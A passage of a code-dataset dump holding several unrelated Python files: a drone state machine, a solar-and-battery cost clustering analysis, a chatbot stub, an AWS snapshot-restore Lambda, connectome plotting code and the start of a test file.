goalPose.pose.position.x) < ERR and abs(mavPose.pose.position.y - goalPose.pose.position.y) < ERR and abs(mavPose.pose.position.z - goalPose.pose.position.z) < ERR):\n setPoint(0, 0, 0)\n while mavState.armed:\n arm(False) \n return 'outcome'\n\n\nrospy.init_node('SquareStateMachine', anonymous = True)\nrate = rospy.Rate(20)\n\nposePub = rospy.Publisher(\"/mavros/setpoint_position/local\", PoseStamped, queue_size = 20)\nstateSub = rospy.Subscriber(\"/mavros/state\", State, stateCallback)\nlocalNow = rospy.Subscriber(\"/mavros/local_position/pose\", PoseStamped, localCallback)\n\nMissionFlowSub = rospy.Subscriber(\"MissionFlow\", Bool, MissionFlowCallback)\n\narm = rospy.ServiceProxy(\"/mavros/cmd/arming\", CommandBool)\nsetModeSrv = rospy.ServiceProxy(\"/mavros/set_mode\", SetMode)\n\n\n\n\nsm = smach.StateMachine(outcomes = ['close'])\n\nwith sm:\n\n smach.StateMachine.add('Takeoff', Takeoff(), \n transitions={'start':'Mission'})\n \n smach.StateMachine.add('Mission', Square(),\n transitions={'rep':'Mission',\n 'end':'RTL'})\n smach.StateMachine.add('RTL', RTL(), transitions={'outcome':'close'})\n\n\nsis = smach_ros.IntrospectionServer('server_name', sm, '/SM_ROOT')\nsis.start()\noutcome = sm.execute()\nrospy.spin()\nsis.stop()\n\n\n\n","sub_path":"6a_Aula/SMpck/src/scripts/SquereSM.py","file_name":"SquereSM.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"593999082","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 30 21:24:57 2019\n\n@author: NIlab\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 29 22:27:09 2019\n\n@author: xuxue\n\"\"\"\n\n### special course的方法 应用到case\n\n\nimport scipy.io as sio\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import MultipleLocator\nimport mpl_toolkits.axisartist as axisartist\nfrom mpl_toolkits.mplot3d import Axes3D #画三维图不可少\nfrom matplotlib import cm #cm 是colormap的简写\n\n### 导入数据 ###\n\npv_raw = pd.read_excel('pv_2018_filled.xlsx')\nload_raw = pd.read_excel('2018_load.xlsx')\nprice_raw = pd.read_excel('spot_price_2018.xlsx')\ntariff = sio.loadmat('DApricethreeyear.mat')\nPC_mat = sio.loadmat('PC_new')\nPD_mat = sio.loadmat('PD_new')\n\nPV_df = pd.DataFrame(np.array(pv_raw.Value_perhour).reshape(365,24))\n\nload_df = pd.DataFrame(np.array(load_raw[\"sum of those w/o hp.\"]).reshape(365,24))\n#load_df = pd.DataFrame(np.array(load_raw[\"sum of those w hp.\"]).reshape(365,24))\n\n#price_perhour = pd.DataFrame(np.array(price_raw.iloc[2:,9].dropna()))\n#price_perhour = list(price_raw.iloc[2:,9].dropna())\np = price_raw.iloc[2:,9].dropna()\n\nprice = []\nfor i in range(2,len(p)+3):\n if i==1996:\n continue\n num = len(p[i])\n if p[i][0] == '-':\n number = -(int(p[i][1:num-3])+int(p[i][num-2:])*0.01)\n else:\n number = int(p[i][0:num-3])+int(p[i][num-2:])*0.01\n price.append(number)\n\n\n#price_perhour = pd.DataFrame(np.array(price).reshape(365,24))\nspot_price = np.array(price)\nprice_perhour_spot = spot_price/1000 # euro/mwh to euro/kwh\n\ntariff_raw = tariff[\"DA2017\"] #price包含三列,第一列 spot price 第二列 DSO tariff 第三列 TSO tariff\nVAT = 0.25\n#Spot_price = tariff_raw[:,0]\nDSO_tariff = tariff_raw[:,1]\nTSO_tariff = tariff_raw[:,2]\nelectricity_tax = 0.774\nprice_perhour_retail = []\nfor i in range(8760):\n price_perhour_retail.append((1+VAT)*(price_perhour_spot[i] + DSO_tariff[i] + TSO_tariff[i] + electricity_tax))\n# price_perhour_retail.append((1+VAT)*(DSO_tariff[i] + TSO_tariff[i] + electricity_tax))\n\n\n#prcie_perhour = price_perhour_spot # 用spot price的情况\nprice_perhour = np.array(price_perhour_retail) # 用retail price的情况\n \n#price_sell = price_perhour_spot\nprice_sell = np.array([0.32 for i in range(8760)])\n\n\n# 输出部分处理\nPC_raw = PC_mat[\"P_C\"]\nPD_raw = PD_mat[\"P_D\"]\n\n# 初始化PC和PD的dataframe 先取第1天数据填入\nPC_df = pd.DataFrame(PC_raw[0,0]) #默认是生成一列\nPC_df = PC_df.T #转置成行\nPD_df = pd.DataFrame(PD_raw[0,0])\nPD_df = PD_df.T\n\n# 把剩下的数据依次往dataframe上拼接 \nfor i in range(1,365):\n PC_temp = pd.DataFrame(PC_raw[0,i])\n PC_temp = PC_temp.T\n PC_df = pd.concat([PC_df,PC_temp])\n PD_temp = pd.DataFrame(PD_raw[0,i])\n PD_temp = PD_temp.T\n PD_df = pd.concat([PD_df,PD_temp])\n \n \n \n#PV求和\nPVinput_day = []\nfor i in range(365):\n PVinput_day.append(PV_df.iloc[i,:].sum())\nPVinput_day = pd.DataFrame(PVinput_day)\n#load求和\nLoadinput_day = []\nfor i in range(365):\n Loadinput_day.append(load_df.iloc[i,:].sum())\nLoadinput_day = pd.DataFrame(Loadinput_day)\n \n### 应用Kmeans进行分类 ###\n# N:PV分类数 M:load分类数\n\nerror_rate_list = [[] for i in range(10)]#根据PV分为10个list,每个list里对应十类load\nN_total = 10\nM_total = 10\n\nfor N in range(1,N_total+1):\n for M in range(1,M_total+1):\n #PV\n estimator_PV = KMeans(n_clusters=N) #构造聚类器\n estimator_PV.fit(PVinput_day) #聚类\n Idx_PV = estimator_PV.labels_ #获取聚类标签\n \n #Load\n estimator_Load = KMeans(n_clusters=M) #构造聚类器\n estimator_Load.fit(Loadinput_day) #聚类\n Idx_load = estimator_Load.labels_ #获取聚类标签\n \n #classification for all data by labels of PV&load\n # classify_xu函数用于将标签分成 N*M 类\n def classify_xu(Idx_PV,Idx_load,N,M):\n label = [None for ii in range(365)]\n for i in range(N):\n for j in range(M):\n for t in range(365):\n if Idx_PV[t] == i and Idx_load[t] == j:\n label[t] = i*M+j\n return label\n \n # label包含所有样本的标签\n label = classify_xu(Idx_PV,Idx_load,N,M);\n \n #A is used to save all types of data (per day) 用于存分过类之后的所有样本\n # y_opt 是365*24的CD值(from optimization)\n y_opt = [[None for ii in range(24)]for jj in range(365)]\n for i in range(365):\n for j in range(24):\n y_opt[i][j] = abs(PC_df.iloc[i,j])-abs(PD_df.iloc[i][j])\n \n A = [[None]for i in range(N*M)]\n for i in range(365):\n A[label[i]].append(y_opt[i])\n for i in range(N*M):\n A[i].pop(0)\n #A = pd.DataFrame(A)\n \n #求每一类的24个小时的每小时平均值\n # CD_classified 分过类之后 N*M 类 profile \n CD_classified = [[None for i in range(24)]for j in range(N*M)]\n for i in range(N*M):\n if A[i]==[]:\n continue\n for hour in range(24):\n sum_hour = 0\n for j in range(len(A[i])):\n sum_hour += A[i][j][hour]\n CD_classified[i][hour] = sum_hour/len(A[i])\n CD_classified_df = pd.DataFrame(CD_classified)\n \n # 将分过类的profile按照label再应用到一年当中,即为预测结果y_est\n y_est_raw = [[None for ii in range(24)]for jj in range(365)]\n for i in range(365):\n # for j in range(24):\n y_est_raw[i] = CD_classified[label[i]]\n \n y_opt_nd = np.array(y_opt)\n y_opt_fl = y_opt_nd.flatten()\n \n y_est_nd = np.array(y_est_raw)\n y_est_test = y_est_nd.flatten()\n y_est = y_est_nd.flatten()\n \n ### SOC limitation ###\n battery_size = 15 #kwh\n SOC_min = 0.2*battery_size\n SOC_max = 0.85*battery_size\n battery_cap = SOC_max - SOC_min\n \n # 找到y_est中第一个大于0的即充电的\n loc = 0\n for i in range(len(y_est)):\n if y_est[i] > 0:\n charge = y_est[i]\n if charge > battery_cap:\n charge = battery_cap\n y_est[i] = battery_cap #保证第一个充电的值不大于battery capacity\n loc += 1\n break\n if y_est[i] < 0:\n charge = 0\n y_est[i] = 0\n \n for j in range(loc,len(y_est)):\n if charge + y_est[j] >= 0:\n former = charge\n charge = charge+y_est[j]\n if charge > battery_cap:\n y_est[j] = battery_cap-former\n charge = battery_cap \n else:\n y_est[j] = -charge\n charge = 0\n \n ### calculate cost by different methods ###\n load_fl = np.array(load_df).flatten() \n PV_fl = np.array(PV_df).flatten() \n #price_perhour = np.array(price_perhour)\n final_opt = -PV_fl + load_fl + y_opt_fl \n final_est = -PV_fl + load_fl + y_est \n \n cost_opt = []\n cost_est = [] \n cost_load = []\n \n for i in range(len(final_opt)) : \n if final_opt[i]>=0: # >0则买电\n cost_opt.append(final_opt[i]*price_perhour[i])\n else:\n cost_opt.append(final_opt[i]*price_sell[i])\n \n for i in range(len(final_est)) : \n if final_est[i]>=0: # >0则买电\n cost_est.append(final_est[i]*price_perhour[i])\n else:\n cost_est.append(final_est[i]*price_sell[i])\n \n for i in range(len(load_fl)) : \n if load_fl[i]>=0: # >0则买电\n cost_load.append(load_fl[i]*price_perhour[i])\n else:\n cost_load.append(load_fl[i]*price_sell[i]) \n \n cost_opt_sum = sum(cost_opt)\n cost_est_sum = sum(cost_est)\n cost_load_sum = sum(cost_load)\n error_rate = ((cost_est_sum - cost_opt_sum)/cost_opt_sum)*100\n error_rate_list[N-1].append(error_rate)\n\n\n\n#plot\n#x,y坐标矩阵\nX = [[j for i in range(10)] for j in range(1,11)]\nY = [[i for i in range(1,11)] for j in range(10)]\nX = np.array(X)\nY = np.array(Y)\n\nerror_rate_list_np = np.array(error_rate_list)\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\nax.plot_surface(X,Y,error_rate_list_np,cmap='rainbow')\n\nax.invert_yaxis() #y轴反向\n#x轴间距1\nx_major_locator=MultipleLocator(1)\n#y轴间距1\ny_major_locator=MultipleLocator(1)\n#设置间距\nax.xaxis.set_major_locator(x_major_locator)\nax.yaxis.set_major_locator(y_major_locator)\nplt.title('Different combinations of N and M',fontsize=20)\nax.set_zlabel('Error Rate (%)',fontsize=20) # 坐标轴\nax.set_ylabel('M (load)',fontsize=20)\nax.set_xlabel('N (PV)',fontsize=20)\n\ner_df = pd.DataFrame(error_rate_list_np)\ner_df.to_excel(\"er100.xlsx\")\n\n\n\n","sub_path":"Program_data analysis/case/new_10_10class.py","file_name":"new_10_10class.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"454299985","text":"def get_answer(raw_question):\n question = str(raw_question).lower()\n answers = {'привет': 'И тебе привет!', 'как дела': 'Лучше всех', 'пока': 'Увидимся'}\n if question in answers:\n print(answers.get(question))\n\n\nif __name__ == '__main__':\n get_answer('привет!')\n get_answer('Как дела')\n get_answer('ПоКа')\n","sub_path":"answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"235772895","text":"import boto3\n\ndef restoreSnapshot(event, context):\n instanceName = event['instanceName']\n \n stsClient = boto3.client('sts')\n identity = stsClient.get_caller_identity()\n ownerId = identity['Account']\n \n ec2Client = boto3.client('ec2')\n mostRecentSnapshot = None\n mostRecentCmdId = None\n snapshotsByCommandId = {}\n filters = [ { 'Name': 'tag:TAG-Name', 'Values': [ instanceName ] } ]\n snapshotsResult = ec2Client.describe_snapshots(Filters=filters, OwnerIds=[ownerId], MaxResults=1000)\n for snapshot in snapshotsResult['Snapshots']:\n cmdId = list(filter(lambda x: x['Key'] == 'CommandId', snapshot['Tags']))[0]['Value']\n if cmdId not in snapshotsByCommandId:\n snapshotsByCommandId[cmdId] = []\n snapshotsByCommandId[cmdId].append(snapshot)\n if mostRecentSnapshot is None or snapshot['StartTime'] > mostRecentSnapshot['StartTime']:\n mostRecentSnapshot = snapshot\n mostRecentCmdId = cmdId\n print('most recent cmd: ' + str(mostRecentCmdId) + ', snapId: ' + mostRecentSnapshot['SnapshotId'])\n if mostRecentCmdId is None:\n raise Exception('No snapshots found for instance ' + instanceName)\n \n ec2Resource = boto3.resource('ec2')\n name = instanceName\n desc = 'Made from instance {}, snapshots'.format(instanceName)\n iType = 't2.micro'\n virt = 'hvm'\n subnet = vpc = root = keyName = ''\n groups = []\n bdm = []\n tagSpec = []\n iamInstProfile = {}\n for snapshot in snapshotsByCommandId[mostRecentCmdId]:\n name += '-' + snapshot['SnapshotId']\n desc += ' ' + snapshot['SnapshotId']\n for tag in snapshot['Tags']:\n if tag['Key'] == 'SecurityGroupIds': groups = tag['Value'].split(',')\n if tag['Key'] == 'InstanceType': iType = tag['Value']\n if tag['Key'] == 'VirtualizationType': virt = tag['Value']\n if tag['Key'] == 'SubnetId': subnet = tag['Value']\n if tag['Key'] == 'VpcId': vpc = tag['Value']\n if tag['Key'] == 'RootDeviceName': root = tag['Value']\n if tag['Key'] == 'KeyName': keyName = tag['Value']\n if tag['Key'] == 'DeviceName': deviceName = tag['Value']\n bdm.append({'DeviceName': deviceName, 'Ebs': {'SnapshotId': snapshot['SnapshotId'], 'VolumeType': 'gp2'}})\n if len(tagSpec) == 0:\n spec = { 'ResourceType': 'instance', 'Tags': [] }\n for tag in snapshot['Tags']:\n if tag['Key'].startswith('TAG-'):\n newTag = tag['Key'][4:]\n value = tag['Value']\n if newTag == 'Name':\n value = tag['Value'] + ' RESTORED'\n spec['Tags'].append({ 'Key': newTag, 'Value': value })\n tagSpec.append(spec)\n if len(iamInstProfile) == 0:\n iam = list(filter(lambda x: x['Key'] == 'IamInstanceProfile', snapshot['Tags']))[0]['Value'].split(',')\n iamInstProfile = { 'Arn': iam[0] } # 'Name': iam[1]\n image = ec2Resource.register_image(Name=name, Description=desc, RootDeviceName=root, BlockDeviceMappings=bdm, VirtualizationType=virt)\n print(image.image_id)\n \n ec2Resource.create_instances(\n ImageId=image.image_id,\n MinCount=1,\n MaxCount=1,\n KeyName=keyName,\n InstanceType=iType,\n IamInstanceProfile=iamInstProfile,\n NetworkInterfaces=[{'SubnetId': subnet, 'DeviceIndex': 0, 'AssociatePublicIpAddress': True, 'Groups': groups}],\n #SecurityGroupIds=groups,\n TagSpecifications=tagSpec\n )\n","sub_path":"AWS/lambda/RestoreSnapshot.py","file_name":"RestoreSnapshot.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"501270403","text":"# %% [markdown]\n# # Imports\nimport os\nimport random\nfrom operator import itemgetter\nfrom pathlib import Path\n\nimport colorcet as cc\nimport matplotlib.colors as mplc\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom graspy.cluster import AutoGMMCluster, GaussianCluster\nfrom graspy.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed\nfrom graspy.plot import gridplot, heatmap, pairplot\nfrom graspy.utils import symmetrize\nfrom src.data import load_metagraph\nfrom src.embed import ase, lse, preprocess_graph\nfrom src.graph import MetaGraph\nfrom src.io import savefig, saveobj, saveskels\nfrom src.visualization import (\n bartreeplot,\n get_color_dict,\n get_colors,\n remove_spines,\n sankey,\n screeplot,\n)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nSAVESKELS = True\nSAVEFIGS = True\nBRAIN_VERSION = \"2020-01-21\"\n\nsns.set_context(\"talk\")\n\nbase_path = Path(\"maggot_models/data/raw/Maggot-Brain-Connectome/\")\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=SAVEFIGS, **kws)\n\n\ndef stashskel(name, ids, labels, colors=None, palette=None, **kws):\n saveskels(\n name,\n ids,\n labels,\n colors=colors,\n palette=None,\n foldername=FNAME,\n save_on=SAVESKELS,\n **kws,\n )\n\n\ndef threshold_sweep(edgelist_df, max_pair_edgelist_df, start=0, stop=0.3, steps=20):\n threshs = np.linspace(start, stop, steps)\n rows = []\n for threshold in threshs:\n thresh_df = max_pair_edge_df[max_pair_edge_df[\"weight\"] > threshold]\n p_sym = len(thresh_df[thresh_df[\"edge pair counts\"] == 2]) / len(thresh_df)\n p_edges_left = (\n thresh_df[\"edge pair counts\"].sum()\n / max_pair_edge_df[\"edge pair counts\"].sum()\n )\n temp_df = edgelist_df[edgelist_df[\"max_weight\"] > threshold]\n p_syns_left = temp_df[\"weight\"].sum() / edgelist_df[\"weight\"].sum()\n row = {\n \"threshold\": threshold,\n \"Prop. paired edges symmetric\": p_sym,\n \"Prop. edges left\": p_edges_left,\n \"Prop. synapses left\": p_syns_left,\n }\n rows.append(row)\n return pd.DataFrame(rows)\n\n\n# %% [markdown]\n# # throw out all edges to or from any cell with...\n# # threshold curves for cells w > 100 dendritic inputs\n# # threshold curves for cells w > 50 dendritic inputs\n# # do the thresholding based on percent input\n\nbase_path = Path(\n \"maggot_models/data/raw/Maggot-Brain-Connectome/4-color-matrices_Brain/\"\n)\nsub_path = Path(\"2020-01-21/input_counts.csv\")\ninput_path = base_path / sub_path\ninput_df = pd.read_csv(input_path)\ninput_df = input_df.set_index(\"skeleton_id\")\ninput_thresh = 100\nremove_inds = input_df[input_df[\" dendrite_inputs\"] < input_thresh].index\n\ngraph_type = \"Gadn\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\ng = mg.g\nmeta = mg.meta\nremove_pdiff = True\nif remove_pdiff:\n keep_inds = np.where(~mg[\"is_pdiff\"])[0]\n mg = mg.reindex(keep_inds)\nedgelist_df = mg.to_edgelist(remove_unpaired=True)\nedgelist_df[\"source\"] = edgelist_df[\"source\"].astype(\"int64\")\nedgelist_df[\"target\"] = edgelist_df[\"target\"].astype(\"int64\")\n\nn_paired_edges = len(edgelist_df)\n# get rid of edges where the target is a low dendritic input node\nedgelist_df = edgelist_df[~edgelist_df[\"target\"].isin(remove_inds)]\nn_left_edges = len(edgelist_df)\n\nmax_pair_edge_df = edgelist_df.groupby(\"edge pair ID\", sort=False).max()\nedge_max_weight_map = dict(zip(max_pair_edge_df.index.values, max_pair_edge_df.values))\nedgelist_df[\"max_weight\"] = itemgetter(*edgelist_df[\"edge pair ID\"])(\n edge_max_weight_map\n)\n\nthresh_result_df = threshold_sweep(edgelist_df, max_pair_edge_df)\n\nfig, ax = plt.subplots(1, 1, figsize=(10, 6))\nsns.lineplot(\n data=thresh_result_df, x=\"threshold\", y=\"Prop. paired edges symmetric\", ax=ax\n)\nremove_spines(ax)\nax_right = plt.twinx(ax)\nsns.lineplot(\n data=thresh_result_df,\n x=\"threshold\",\n y=\"Prop. edges left\",\n ax=ax_right,\n color=\"orange\",\n label=\"Edges\",\n)\nremove_spines(ax_right)\nsns.lineplot(\n data=thresh_result_df,\n x=\"threshold\",\n y=\"Prop. synapses left\",\n ax=ax_right,\n color=\"green\",\n label=\"Synapses\",\n)\nax_right.set_ylabel(\"Prop. left\")\nax.set_title(\n f\"Min dendridic input = {input_thresh} (removed {n_paired_edges - n_left_edges} edges)\"\n)\npad = 0.02\nax.set_ylim((0 - pad, 1 + pad))\nax_right.set_ylim((0 - pad, 1 + pad))\nplt.legend(bbox_to_anchor=(1.08, 1), loc=2, borderaxespad=0.0)\nstashfig(f\"min-dend-{input_thresh}-threshold-sweep-{graph_type}\")\n# %% [markdown]\n# # get number of inputs to kenyon cells\n# # just list the number of connections onto each kenyon cell, by claw number\nplt.style.use(\"seaborn-whitegrid\")\nsns.set_context(\"talk\")\ngraph_type = \"Gad\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\nedgelist_df = mg.to_edgelist()\nadj = mg.adj\nclass_labels = mg.meta[\"Class 1\"].fillna(\"\")\nsubclass_labels = mg.meta[\"Class 2\"].fillna(\"\")\nkc_inds = np.where(class_labels == \"KC\")[0]\nfor i in range(1, 7):\n name = f\"{i}claw\"\n sub_edgelist_df = edgelist_df[edgelist_df[\"target Class 2\"] == name]\n ids = sub_edgelist_df[\"target\"].unique()\n # fig, ax = plt.subplots(1, 1, figsize=(15, 5))\n fig = plt.figure(figsize=(20, 7))\n ax = plt.subplot2grid((1, 5), (0, 0), colspan=4)\n ax2 = plt.subplot2grid((1, 5), (0, 4), colspan=1)\n sns.stripplot(data=sub_edgelist_df, y=\"weight\", x=\"target\", ax=ax, order=ids)\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_title(name + \" input weights\")\n # remove_spines(ax, keep_corner=True)\n mins = []\n ticks = ax.get_xticks()\n color = sns.color_palette(\"deep\", desat=1, n_colors=2)[1]\n for j, cell_id in enumerate(ids):\n cell_df = sub_edgelist_df[sub_edgelist_df[\"target\"] == cell_id]\n cell_df = cell_df.sort_values(\"weight\", ascending=False)\n cell_df = cell_df.iloc[:i, :]\n min_max_weight = cell_df[\"weight\"].min()\n ax.text(\n j,\n min_max_weight,\n min_max_weight,\n fontsize=\"small\",\n horizontalalignment=\"center\",\n verticalalignment=\"bottom\",\n )\n mins.append(min_max_weight)\n sns.violinplot(\n mins, ax=ax2, orient=\"v\", inner=\"quart\", color=color, alpha=0.8, saturation=1\n )\n median = np.median(mins)\n ax2.text(\n 0,\n median,\n f\"{median:.0f}\",\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n backgroundcolor=color,\n alpha=0.8,\n )\n # ax2.yaxis.set_major_locator(plt.NullLocator())\n ax2.set_ylim(ax.get_ylim())\n ax2.yaxis.set_ticks([])\n ax2.set_title(\"\")\n stashfig(name + \"-input-weights\")\n\nname = \"all KC\"\nkc_edgelist_df = edgelist_df[edgelist_df[\"target Class 1\"] == \"KC\"]\nfig, ax = plt.subplots(1, 1, figsize=(15, 5))\nsns.stripplot(\n data=kc_edgelist_df,\n y=\"weight\",\n x=\"target Class 2\",\n ax=ax,\n order=[f\"{i}claw\" for i in range(1, 7)],\n jitter=0.45,\n)\nfor tick in ax.get_xticklabels():\n tick.set_rotation(90)\nax.set_title(name + \" input weights\")\n# remove_spines(ax, keep_corner=True)\nstashfig(\"all-kc-input-weights\")\n\n# %% [markdown]\n# # plot the distribution of # of dendritic / axonic inputs\n\ngraph_type = \"Gad\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\nmeta = mg.meta\nmeta.loc[input_df.index, \"dendrite_input\"] = input_df[\" dendrite_inputs\"]\nmeta.loc[input_df.index, \"axon_input\"] = input_df[\" axon_inputs\"]\n\n\ndef filter(string):\n string = string.replace(\"akira\", \"\")\n string = string.replace(\"Lineage\", \"\")\n string = string.replace(\"*\", \"\")\n string = string.strip(\"_\")\n return string\n\n\nlineages = meta[\"lineage\"]\nlineages = np.vectorize(filter)(lineages)\nmeta[\"lineage\"] = lineages\n\n\nn_rows = 6\nfig, axs = plt.subplots(n_rows, 1, figsize=(15, 30), sharey=True)\nuni_lineages = np.unique(meta[\"lineage\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = meta[meta[\"lineage\"].isin(temp_lineages)]\n sns.stripplot(\n data=temp_df, x=\"lineage\", y=\"dendrite_input\", ax=ax, palette=\"deep\", jitter=0.4\n )\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nplt.tight_layout()\nstashfig(\"all-lineage-dendrite-input\")\n\n# %% [markdown]\n# # Plot this but by cell class\nn_rows = 3\nuni_lineages = np.unique(meta[\"Merge Class\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfig, axs = plt.subplots(n_rows + 1, 1, figsize=(15, 30), sharey=True)\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = meta[meta[\"Merge Class\"].isin(temp_lineages)]\n sns.stripplot(\n data=temp_df,\n x=\"Merge Class\",\n y=\"dendrite_input\",\n ax=ax,\n palette=\"deep\",\n jitter=0.4,\n )\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nxlim = ax.get_xlim()\nax = axs[-1]\ntemp_lineages = uni_lineages[(i + 1) * n_per_row :]\ntemp_df = meta[meta[\"Merge Class\"].isin(temp_lineages)]\nsns.stripplot(\n data=temp_df, x=\"Merge Class\", y=\"dendrite_input\", ax=ax, palette=\"deep\", jitter=0.4\n)\nfor tick in ax.get_xticklabels():\n tick.set_rotation(90)\nax.set_xlabel(\"\")\nremove_spines(ax)\nax.yaxis.set_major_locator(plt.MaxNLocator(3))\nax.xaxis.set_tick_params(length=0)\nax.set_xlim(xlim)\nplt.tight_layout()\nstashfig(\"all-merge-class-dendrite-input\")\n\n# %% [markdown]\n# # plot some kind of asymmetry score by lineage\n# # - proportion of edges onto a lineage which are asymmetric after thresholding\n# # - IOU score?\n# # - something else?\n\ngraph_type = \"Gadn\"\nmg = load_metagraph(graph_type, version=BRAIN_VERSION)\ng = mg.g\nmeta = mg.meta\n\nlineages = meta[\"lineage\"]\nlineages = np.vectorize(filter)(lineages)\nmeta[\"lineage\"] = lineages\n\nedgelist_df = mg.to_edgelist(remove_unpaired=True)\nedgelist_df[\"source\"] = edgelist_df[\"source\"].astype(\"int64\")\nedgelist_df[\"target\"] = edgelist_df[\"target\"].astype(\"int64\")\n\nn_paired_edges = len(edgelist_df)\n# get rid of edges where the target is a low dendritic input node\nedgelist_df = edgelist_df[~edgelist_df[\"target\"].isin(remove_inds)]\nn_left_edges = len(edgelist_df)\n\nmax_pair_edge_df = edgelist_df.groupby(\"edge pair ID\").max()\nedge_max_weight_map = dict(\n zip(max_pair_edge_df.index.values, max_pair_edge_df[\"weight\"])\n)\nedgelist_df[\"max_weight\"] = itemgetter(*edgelist_df[\"edge pair ID\"])(\n edge_max_weight_map\n)\n\nthreshold = 0.0\nthresh_df = max_pair_edge_df[max_pair_edge_df[\"weight\"] > threshold]\n\nsource_pair_ids = np.unique(max_pair_edge_df[\"source Pair ID\"])\ntarget_pair_ids = np.unique(max_pair_edge_df[\"target Pair ID\"])\npair_ids = np.union1d(source_pair_ids, target_pair_ids)\n\nrows = []\nfor pid in pair_ids:\n temp_df = thresh_df[\n (thresh_df[\"source Pair ID\"] == pid) | (thresh_df[\"target Pair ID\"] == pid)\n ]\n\n if len(temp_df) > 0:\n iou = len(temp_df[temp_df[\"edge pair counts\"] == 2]) / len(temp_df)\n else:\n iou = 0\n\n temp_meta = meta[meta[\"Pair ID\"] == pid]\n lineage = temp_meta[\"lineage\"].values[0]\n row = {\"IOU\": iou, \"lineage\": lineage}\n rows.append(row)\n\nlineage_iou_df = pd.DataFrame(rows)\n\nn_rows = 6\nfig, axs = plt.subplots(n_rows, 1, figsize=(15, 30), sharey=True)\nuni_lineages = np.unique(lineage_iou_df[\"lineage\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = lineage_iou_df[lineage_iou_df[\"lineage\"].isin(temp_lineages)]\n sns.stripplot(data=temp_df, x=\"lineage\", y=\"IOU\", ax=ax, palette=\"deep\", jitter=0.4)\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nplt.suptitle(f\"IOU after threshold = {threshold}\", y=1.02)\nplt.tight_layout()\nstashfig(f\"all-lineage-iou-{threshold}\")\n\n# %% [markdown]\n# # Do the same by cell class\n\nrows = []\nfor pid in pair_ids:\n temp_df = thresh_df[\n (thresh_df[\"source Pair ID\"] == pid) | (thresh_df[\"target Pair ID\"] == pid)\n ]\n\n if len(temp_df) > 0:\n iou = len(temp_df[temp_df[\"edge pair counts\"] == 2]) / len(temp_df)\n else:\n iou = 0\n\n temp_meta = meta[meta[\"Pair ID\"] == pid]\n lineage = temp_meta[\"Merge Class\"].values[0]\n row = {\"IOU\": iou, \"Merge Class\": lineage}\n rows.append(row)\n\nlineage_iou_df = pd.DataFrame(rows)\n\nn_rows = 3\nfig, axs = plt.subplots(n_rows, 1, figsize=(15, 30), sharey=True)\nuni_lineages = np.unique(lineage_iou_df[\"Merge Class\"])\nn_lineages = len(uni_lineages)\nn_per_row = n_lineages // n_rows\nfor i in range(n_rows):\n ax = axs[i]\n temp_lineages = uni_lineages[i * n_per_row : (i + 1) * n_per_row]\n temp_df = lineage_iou_df[lineage_iou_df[\"Merge Class\"].isin(temp_lineages)]\n sns.stripplot(\n data=temp_df, x=\"Merge Class\", y=\"IOU\", ax=ax, palette=\"deep\", jitter=0.4\n )\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n ax.set_xlabel(\"\")\n remove_spines(ax)\n ax.yaxis.set_major_locator(plt.MaxNLocator(3))\n ax.xaxis.set_tick_params(length=0)\nplt.suptitle(f\"IOU after threshold = {threshold}\", y=1.02)\nplt.tight_layout()\nstashfig(f\"all-class-iou-{threshold}\")\n","sub_path":"notebooks/64.2-BDP-threshold-investigations.py","file_name":"64.2-BDP-threshold-investigations.py","file_ext":"py","file_size_in_byte":13678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"483162823","text":"import unittest\nfrom app import app\nfrom db import db\nfrom models.users import UsersModel\nfrom models.motos import MotosModel\nfrom models.rentals import RentalsModel\nfrom datetime import datetime\n\nclass BaseTestClass(unittest.TestCase):\n def setUp(self):\n self.app = app\n self.client = 